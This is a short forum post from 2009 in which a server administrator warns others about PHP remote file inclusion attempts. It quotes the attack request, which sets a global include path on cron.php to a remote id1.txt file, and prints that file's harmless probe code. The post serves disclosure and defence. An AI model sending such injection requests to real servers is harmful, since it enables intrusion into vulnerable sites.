Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie

id1.txt PHP RFI - Fx29ID

  • 03-11-2009 12:59PM
    #1
    Registered Users, Registered Users 2 Posts: 81,219 ✭✭✭✭


    Little hackers have been trying to get at my servers a while now, using a PHP file inclusion exploit. For some reason they always use the same name on the payload file - id1.txt

    In this instance they've tried to append to a URL on my server ****/cron.php?GLOBALS[AA_INC_PATH]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt???
    File content is
    <?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

    More info here

    Could be worth having a look through your servers for id1.txt


Advertisement